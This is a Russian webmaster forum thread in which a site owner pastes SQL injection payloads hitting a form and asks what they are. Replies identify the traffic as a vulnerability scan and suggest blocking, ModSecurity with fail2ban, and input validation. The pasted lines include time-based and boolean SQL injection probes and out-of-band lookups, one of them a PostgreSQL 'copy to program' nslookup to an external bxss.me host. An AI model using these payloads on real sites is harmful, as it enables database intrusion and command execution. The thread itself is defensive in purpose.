Форум Сайтостроение Безопасность

Атака на сайт с передачей через форму разного рода непонятных параметров? Чем это сулит?

123 4
V
На сайте с 10.01.2012
Offline
85
Varenik
5100

Приветствую, уважаемые гуру...

Сегодня на сайт началась атака и уже порядка 7 часов не прекращается...

Посредством обработчика одной из форм идут попытки записать в БД какую-то гадость посредством передачи POST запросом в значениях формы.

Периодически меняется идентификатор формы, в который подставляются данные. Ниже скину по очереди несколько значений которые подряд идут при каждой новой попытке. Подскажите, какая может быть цель у этих иродов исходя из кода, который пытаются передать через форму. 


if(now()=sysdate(),sleep(420),0)/*\'XOR(if(now()=sysdate(),sleep(420),0))OR\'"XOR(if(now()=sysdate(),sleep(420),0))OR"*/

(select(0)from(select(sleep(420)))v)/*\'+(select(0)from(select(sleep(420)))v)+\'"+(select(0)from(select(sleep(420)))v)+"*/

-1; waitfor delay \'0:0:420\' -- 

-1); waitfor delay \'0:0:420\' -- 

1 waitfor delay \'0:0:420\' -- 

aUgtJ1Jh\'; waitfor delay \'0:0:140\' -- 

-1;select pg_sleep(140); -- 

-1);select pg_sleep(140); -- 

-1));select pg_sleep(140); -- 

NiwVY2Ly\';select pg_sleep(140); -- 

UCWUfdRh\');select pg_sleep(140); -- 

Zpn3BjsT\'));select pg_sleep(280); -- 

1||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.013405.986-17533.986.f76fb.1.bxss\'||\'.me\')

\'||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.013405.986-17534.986.f76fb.1.bxss\'||\'.me\')||\'

1;copy (select \'\') to program \'nslookup dns.sqli.\\013405.986-17535.986.f76fb.\\1.bxss.me\'

1\';copy (select \'\') to program \'nslookup dns.sqli.\\013405.986-17536.986.f76fb.\\1.bxss.me

836\'

1

1

-1 OR 2+306-306-1=0+0+0+1 -- 

-1 OR 2+46-46-1=0+0+0+1

-1\' OR 2+946-946-1=0+0+0+1 -- 

-1\' OR 2+246-246-1=0+0+0+1 or \'jM2wJpwt\'=\'

-1" OR 2+826-826-1=0+0+0+1 --

И того - 24 запроса в которых код по очереди как выше (каждая строка - код с последующей заявки) и далее по новой...

Что это за зверь не подскажите?

Mik Foxi
На сайте с 02.03.2011
Offline
1165
Mik Foxi
#1

Ищут уязвимости на вашем сайте.

Антибот, антиспам, веб файрвол, защита от накрутки поведенческих: https://antibot.cloud/ Форум на замену серчу: https://foxi.biz/
V
На сайте с 10.01.2012
Offline
85
Varenik
#2

Ну это понятно как таково...

Если я правильно понимаю - это попытки найти дыры в PostgreSQL...

Меня смутил урл ___bxss.me. При переходе на него редиректит на сайт acunetix - AcuMonitor: Detecting XXE, Blind XSS, and SSRF Attacks.

---------- Добавлено 11.10.2019 в 16:32 ----------

И собственно основной вопрос - как можно обезопасить себя от подобного?

По сути с этой атакой проблема решена банально просто - айпишник с которого шло занес в блеклист и все. Но все же...

Telderi.ru лидирующая биржа сайтов Как обезопасить сайт от Яндекс.Дзен. Часть 8
A
На сайте с 20.08.2010
Offline
775
awasome
#3

Это не поможет? http://networker.by/blokirovka-post-zaprosov-v-htaccess/

Была тема с post-запросами в 2013 году, спасались тогда блокировкой.

suffix
На сайте с 26.08.2010
Offline
331
suffix
#4

Поставить ModSecurity (как модуль Apache или nginx), затем в fail2ban настроить правило [modsecurity] - шаблон там уже есть и спать спокойно !

Клуб любителей хрюш (https://www.babai.ru)
Mik Foxi
На сайте с 02.03.2011
Offline
1165
Mik Foxi
#5

Антибот из моей подписи помогает в таких ситуациях.

Vladimir
На сайте с 07.06.2004
Offline
585
Vladimir
#6
Varenik:

И собственно основной вопрос - как можно обезопасить себя от подобного...

Что у вас за программист? Это, же азы, не допускать до обработчика всякую хрень.

- Заполняется это в любом случае програмно, то вначале проверка на бота ( не капча )

- Проверка полей формы и преобразование данных, до передачи обработчику

Аэройога ( https://vk.com/aeroyogadom ) Йога в гамаках ( https://vk.com/aero_yoga ) Аэройога обучение ( https://aeroyoga.ru ) и просто фото ( https://weandworld.com )
В функции «Добавить в Поиск@Mail.ru упростил поиск авиабилетов Google Ads сможет приостанавливать
S
На сайте с 30.09.2016
Offline
469
Sitealert
#7
Nadejda:
Проверка полей формы и преобразование данных, до передачи обработчику

Глупости писать не надо.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
Vladimir
На сайте с 07.06.2004
Offline
585
Vladimir
#8
Sitealert:
Глупости писать не надо.

Это у вас глупости, вам пришли данные на обработчик, проверьте их, и exit, если они нафиг не нужны

И, на бота, там же проверяется. Если умеете, только капчей проверять, то просто не умеете готовить (программить)

PS На десятках сайтах, ни капчи, ни спама, ни такой херни. И обработчики "самописом" писались лет 15 назад

Googlebot не видит контент, Яндекс.Метрика научилась распознавать важные Новая версия CS Yazzle
S
На сайте с 30.09.2016
Offline
469
Sitealert
#9
Nadejda:
Это у вас глупости

Глупости – у тех кто их пишет, я глупостей не писал.

Не можешь внятно выразить свои мысли – лучше вообще ничего не пиши, чтобы у людей от такой писанины голова не пухла.

Nadejda:
пришли данные на обработчик, проверьте их
Так пришли или не пришли?
Nadejda:
Если умеете, только капчей проверять, то просто не умеете готовить (программить)

Кто здесь вообще что-то про капчу говорил? Тема вообще про другое.

Nadejda:
На десятках сайтах, ни капчи, ни спама, ни такой херни. И обработчики "самописом" писались лет 15 назад
Это великое достижение? Типо похвастаться надо?
Джон Мюллер поделился своими Артур Латыпов: «Трудолюбие и Google: большинству сайтов не
Vladimir
На сайте с 07.06.2004
Offline
585
Vladimir
#10
Sitealert:
Так пришли или не пришли?

Пришли они или нет, придут или нет, у вас в любом случае должна быть проверка на входящие данные, и если вы этого не понимете, то какой из вас программист?

Пользоваться готовыми обработчиками, в которых даже не знаете, что проверяется, а что нет?

---------- Добавлено 13.10.2019 в 13:47 ----------

Sitealert:

Кто здесь вообще что-то про капчу говорил?

А, то что она у всех, и на 90 % не работает. А, проверив только на бота....на 90%, сработает exit, без дальнейшей проверки всех входящих данных

---------- Добавлено 13.10.2019 в 13:59 ----------

Varenik:
айпишник с которого шло занес в блеклист и все. Но все же...

Вы, умеете пользоваться прокси? Ну, бывает школота балуется с одного, но в основном Ip меняется, и уповать на блеклист не стоит.

Через какое время сайт Все вопросы по robots.txt Как индусы клепают шаблоны
123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий